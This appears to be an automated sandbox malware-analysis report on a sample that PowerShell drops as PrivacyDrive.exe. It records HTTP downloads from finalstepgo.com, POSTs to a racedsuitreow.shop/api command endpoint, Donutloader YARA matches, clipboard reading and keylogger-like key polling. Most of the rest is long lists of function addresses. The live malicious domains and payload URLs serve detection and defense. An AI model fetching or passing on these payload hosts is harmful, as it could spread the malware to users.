Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uploads/il222.zip HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMTUser-Agent: Microsoft BITS/7.8Host: finalstepgo.com

Source: global traffic	DNS traffic detected: DNS query: finalstepgo.com
Source: global traffic	DNS traffic detected: DNS query: candleduseiwo.shop
Source: global traffic	DNS traffic detected: DNS query: racedsuitreow.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop

Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://crl.thawte.com/ThawtePremiumServerCA.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000003.00000002.2896624234.0000024B0900D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1721693277.0000024B0924D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://t2.symcb.com0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://tl.symcd.com0&
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.12.dr	String found in binary or memory: http://upx.sf.net
Source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr	String found in binary or memory: http://www.privacy-drive.comx
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com/
Source: svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com/a
Source: svchost.exe, 00000003.00000002.2896185836.0000024B04302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2895863314.0000024B03A5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1825018991.0000024B08F61000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr	String found in binary or memory: https://finalstepgo.com/uploads/il222.zip
Source: svchost.exe, 00000003.00000002.2896857883.0000024B090DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com/uploads/il222.zipK
Source: svchost.exe, 00000003.00000002.2896766529.0000024B0905B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com:443/uploads/il222.zip
Source: svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finalstepgo.com:443/uploads/il222.zipe
Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/
Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001722000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1933666752.000000000171F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/)e3
Source: PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/3
Source: PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/P
Source: PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923428960.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api
Source: PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apiJV&
Source: PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apiU.h
Source: PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apiV
Source: PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028967735.00000000015F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apie
Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/apisP
Source: PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop:443/api
Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923320011.0000000001718000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-ma
Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://www.cybertronsoft.com
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://www.thawte.com/cps0
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: PrivacyDrive.exe.2.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49749 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00424260 OpenClipboard,GetClipboardData,CloseClipboard,

4_2_00424260

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00424260 OpenClipboard,GetClipboardData,CloseClipboard,

4_2_00424260

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00422070 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

4_2_00422070

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Jump to dropped file

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FDC583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,		4_2_00FDC583
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FCC583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,		8_2_00FCC583

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0045D070: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle,

4_2_0045D070

Contains functionality to delete services

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0041D0B0 PathFileExistsW,OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,

4_2_0041D0B0

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050E640	4_2_0050E640
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0043D090	4_2_0043D090
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050F158	4_2_0050F158
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050715B	4_2_0050715B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004E9350	4_2_004E9350
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004133B0	4_2_004133B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0049B470	4_2_0049B470
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050E674	4_2_0050E674
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0044B630	4_2_0044B630
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0051B680	4_2_0051B680
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0045F770	4_2_0045F770
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004237D0	4_2_004237D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004C3850	4_2_004C3850
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004C28B0	4_2_004C28B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050F955	4_2_0050F955
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0050F974	4_2_0050F974
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0044AB40	4_2_0044AB40
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004AEBE0	4_2_004AEBE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0040FD70	4_2_0040FD70
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00514E40	4_2_00514E40
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00441E60	4_2_00441E60
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FDC583	4_2_00FDC583
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8055F	4_2_00F8055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FB80E2	4_2_00FB80E2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F931C2	4_2_00F931C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FCC2B2	4_2_00FCC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F85292	4_2_00F85292
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FB8372	4_2_00FB8372
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FDD5C4	4_2_00FDD5C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FAD652	4_2_00FAD652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FB9792	4_2_00FB9792
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F898B2	4_2_00F898B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8E802	4_2_00F8E802
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FAB99B	4_2_00FAB99B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8CAE2	4_2_00F8CAE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8DA82	4_2_00F8DA82
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FB9A42	4_2_00FB9A42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F83A08	4_2_00F83A08
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FA0B95	4_2_00FA0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82CB5	4_2_00F82CB5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FBFCA2	4_2_00FBFCA2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FC9DB2	4_2_00FC9DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82D5B	4_2_00F82D5B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F86EFD	4_2_00F86EFD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8BEE2	4_2_00F8BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F86EB2	4_2_00F86EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F88EB2	4_2_00F88EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82E8E	4_2_00F82E8E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82E1A	4_2_00F82E1A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F82FB3	4_2_00F82FB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8CF72	4_2_00F8CF72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051AB570	4_2_051AB570
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A15B1	4_2_051A15B1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A1418	4_2_051A1418
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A148C	4_2_051A148C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A54B0	4_2_051A54B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A74B0	4_2_051A74B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A54FB	4_2_051A54FB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051AA4E0	4_2_051AA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051B17C0	4_2_051B17C0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051D66E0	4_2_051D66E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051BF193	4_2_051BF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A2006	4_2_051A2006
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051D8040	4_2_051D8040
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051AC080	4_2_051AC080
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051AB0E0	4_2_051AB0E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A1359	4_2_051A1359
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051E83B0	4_2_051E83B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A12B3	4_2_051A12B3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051DE2A0	4_2_051DE2A0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051D7D90	4_2_051D7D90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051CBC50	4_2_051CBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051C9F99	4_2_051C9F99
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051ACE00	4_2_051ACE00
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A7EB0	4_2_051A7EB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051D6970	4_2_051D6970
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A3890	4_2_051A3890
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FCC583	8_2_00FCC583
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7055F	8_2_00F7055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FA80E2	8_2_00FA80E2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F831C2	8_2_00F831C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FBC2B2	8_2_00FBC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F75292	8_2_00F75292
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FA8372	8_2_00FA8372
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FCD5C4	8_2_00FCD5C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F9D652	8_2_00F9D652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FA9792	8_2_00FA9792
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F798B2	8_2_00F798B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7E802	8_2_00F7E802
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F9B99B	8_2_00F9B99B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7CAE2	8_2_00F7CAE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7DA82	8_2_00F7DA82
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FA9A42	8_2_00FA9A42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F73A08	8_2_00F73A08
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F90B95	8_2_00F90B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72CB5	8_2_00F72CB5
